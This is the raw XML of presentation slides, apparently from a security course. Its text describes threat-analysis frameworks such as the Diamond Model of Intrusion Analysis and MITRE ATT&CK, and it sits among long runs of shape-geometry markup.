          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1466850" h="85725">
                <a:moveTo>
                  <a:pt x="1409192" y="42798"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1380617" y="85724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1437682" y="57149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1409192" y="57149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1409192" y="42798"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1466850" h="85725">
                <a:moveTo>
                  <a:pt x="1399695" y="28574"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="28574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="57149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1399638" y="57149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1409192" y="42798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1399695" y="28574"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1466850" h="85725">
                <a:moveTo>
                  <a:pt x="1437851" y="28574"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1409192" y="28574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1409192" y="57149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1437682" y="57149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1466342" y="42798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1437851" y="28574"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1466850" h="85725">
                <a:moveTo>
                  <a:pt x="1380617" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1409192" y="42798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1409192" y="28574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1437851" y="28574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1380617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503" y="306451"/>
            <a:ext cx="463550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30">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Other</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-155">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-150">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="135">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Frameworks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69535" y="760476"/>
            <a:ext cx="6969252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986152" y="2859404"/>
            <a:ext cx="12563475" cy="2712085"/>
            <a:chOff x="1986152" y="2859404"/>
            <a:chExt cx="12563475" cy="2712085"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2106929" y="2868929"/>
              <a:ext cx="5876925" cy="634365"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5876925" h="634364">
                  <a:moveTo>
                    <a:pt x="5770880" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="105663" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64561" y="8312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30972" y="30972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8312" y="64561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="105664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="633984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5876544" y="633984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5876544" y="105664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5868231" y="64561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5845571" y="30972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5811982" y="8312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5770880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106929" y="2868929"/>
              <a:ext cx="5876925" cy="634365"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5876925" h="634364">
                  <a:moveTo>
                    <a:pt x="105663" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5770880" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5811982" y="8312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5845571" y="30972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5868231" y="64561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5876544" y="105664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5876544" y="633984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="633984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="105664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8312" y="64561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30972" y="30972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64561" y="8312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105663" y="0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995677" y="3502913"/>
              <a:ext cx="12544425" cy="2059305"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="2059304">
                  <a:moveTo>
                    <a:pt x="12374880" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="169164" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124177" y="6039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83763" y="23085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49530" y="49530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23085" y="83763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6039" y="124177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="169163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1889760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6039" y="1934746"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23085" y="1975160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49530" y="2009393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83763" y="2035838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124177" y="2052884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169164" y="2058924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12374880" y="2058924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12419866" y="2052884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12460280" y="2035838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12494513" y="2009393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12520958" y="1975160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12538004" y="1934746"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544043" y="1889760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544043" y="169163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12538004" y="124177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12520958" y="83763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12494514" y="49530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12460280" y="23085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12419866" y="6039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123748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995677" y="3502913"/>
              <a:ext cx="12544425" cy="2059305"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="2059304">
                  <a:moveTo>
                    <a:pt x="0" y="169163"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6039" y="124177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23085" y="83763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49530" y="49530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83763" y="23085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124177" y="6039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169164" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12374880" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12419866" y="6039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12460280" y="23085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12494514" y="49530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12520958" y="83763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12538004" y="124177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544043" y="169163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544043" y="1889760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12538004" y="1934746"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12520958" y="1975160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12494513" y="2009393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12460280" y="2035838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12419866" y="2052884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12374880" y="2058924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169164" y="2058924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124177" y="2052884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83763" y="2035838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49530" y="2009393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23085" y="1975160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6039" y="1934746"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1889760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="169163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1932813" y="5972936"/>
            <a:ext cx="12561570" cy="2494280"/>
            <a:chOff x="1932813" y="5972936"/>
            <a:chExt cx="12561570" cy="2494280"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="object 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1942338" y="6544817"/>
              <a:ext cx="12542520" cy="1912620"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12542519" h="1912620">
                  <a:moveTo>
                    <a:pt x="0" y="157098"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8011" y="107452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30317" y="64328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64328" y="30317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107452" y="8011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157099" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12385421" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12435067" y="8011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12478191" y="30317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12512202" y="64328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12534508" y="107452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12542519" y="157098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12542519" y="1755482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12534508" y="1805148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12512202" y="1848283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12478191" y="1882300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12435067" y="1904608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12385421" y="1912619"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157099" y="1912619"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107452" y="1904608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64328" y="1882300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30317" y="1848283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8011" y="1805148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1755482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="157098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076450" y="5982461"/>
              <a:ext cx="5942330" cy="562610"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5942330" h="562609">
                  <a:moveTo>
                    <a:pt x="5848350" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="93725" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57221" y="7358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27431" y="27431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7358" y="57221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="93725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="562356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5942076" y="562356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5942076" y="93725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5934717" y="57221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5914644" y="27431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5884854" y="7358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5848350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076450" y="5982461"/>
              <a:ext cx="5942330" cy="562610"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5942330" h="562609">
                  <a:moveTo>
                    <a:pt x="93725" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5848350" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5884854" y="7358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5914644" y="27431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5934717" y="57221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5942076" y="93725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5942076" y="562356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="562356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="93725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7358" y="57221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27431" y="27431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57221" y="7358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93725" y="0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2137029" y="7049626"/>
            <a:ext cx="11679555" cy="79184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7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Refers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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>framework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describing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adversary,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capability,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infrastructure,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effect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endParaRPr sz="22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  <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
            </a:pP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victim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25420" y="6068314"/>
            <a:ext cx="538543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22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Diamond</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Model</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Intrusion</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Analysis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23694" y="1882292"/>
            <a:ext cx="11934190" cy="3487420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algn="ctr" marL="69215">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="495"/>
              </a:spcBef>
            </a:pP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Other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frameworks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appointed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help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categorizing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features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adversary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behaviors.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="74295">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="395"/>
              </a:spcBef>
            </a:pP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They</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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include: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Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-95">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>MITRE</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>ATT&amp;CK</a:t>
            </a:r>
            <a:endParaRPr sz="22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2540"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="63636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Makes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database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20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>TTPs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directly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comparable</a:t>
            </a:r>
            <a:endParaRPr sz="22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2630"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="63636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Sequence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which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tactic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categories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deployed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not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explicit</a:t>
            </a:r>
            <a:endParaRPr sz="22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2650"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="63636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No</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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explicit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sequencing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503" y="306451"/>
            <a:ext cx="463550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30">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Other</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-155">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-150">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="135">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Frameworks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69535" y="760476"/>
            <a:ext cx="6969252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895980" y="1933193"/>
            <a:ext cx="1046099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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>diamond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model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Intrusion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analysis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dirty="0" sz="2200" spc="100">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>framework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analyze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intrusion.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795516" y="3477767"/>
            <a:ext cx="2915285" cy="3992879"/>
            <a:chOff x="6795516" y="3477767"/>
            <a:chExt cx="2915285" cy="3992879"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6918960" y="3483863"/>
              <a:ext cx="2780030" cy="3778250"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2780029" h="3778250">
                  <a:moveTo>
                    <a:pt x="1389888" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1888998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1389888" y="3777996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2779776" y="1888998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1389888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918960" y="3483863"/>
              <a:ext cx="2780665" cy="3778250"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2780665" h="3778250">
                  <a:moveTo>
                    <a:pt x="0" y="1888998"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1389888" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2779776" y="1888998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1389888" y="3777996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1888998"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2780665" h="3778250">
                  <a:moveTo>
                    <a:pt x="0" y="1889760"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2780157" y="1889760"/>
                  </a:lnTo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795516" y="3477767"/>
              <a:ext cx="2915285" cy="3992879"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2915284" h="3992879">
                  <a:moveTo>
                    <a:pt x="1176274" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1005205" y="86360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1050988" y="120472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33401" y="1487424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79248" y="1521587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1096848" y="154635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1142619" y="188722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1158875" y="97536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1176274" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2915284" h="3992879">
                  <a:moveTo>
                    <a:pt x="1358773" y="3992372"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1340904" y="3895598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1323975" y="3803904"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1278293" y="3838359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45720" y="2204720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2239264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1232687" y="3872750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1187069" y="3907155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1358773" y="3992372"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2915284" h="3992879">
                  <a:moveTo>
                    <a:pt x="2482469" y="1729359"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2482342" y="1672209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="880059" y="1675333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="879983" y="1618234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708660" y="1704213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="880237" y="1789684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="880148" y="1732534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2482469" y="1729359"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2915284" h="3992879">
                  <a:moveTo>
                    <a:pt x="2915158" y="2305812"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2745359" y="2394851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2791739" y="2428240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1772031" y="3843655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1818513" y="3877056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2838107" y="2461615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2884551" y="2495042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2899105" y="2404999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2915158" y="2305812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7649718" y="2956051"/>
            <a:ext cx="131445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85" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Adversary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300843" y="5167121"/>
            <a:ext cx="130556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70" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Capability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62645" y="7593330"/>
            <a:ext cx="83820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35" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Vi</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="80" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>ctim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02582" y="5167121"/>
            <a:ext cx="183959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80" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Infrastructure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031348" y="6457950"/>
            <a:ext cx="173799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30">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
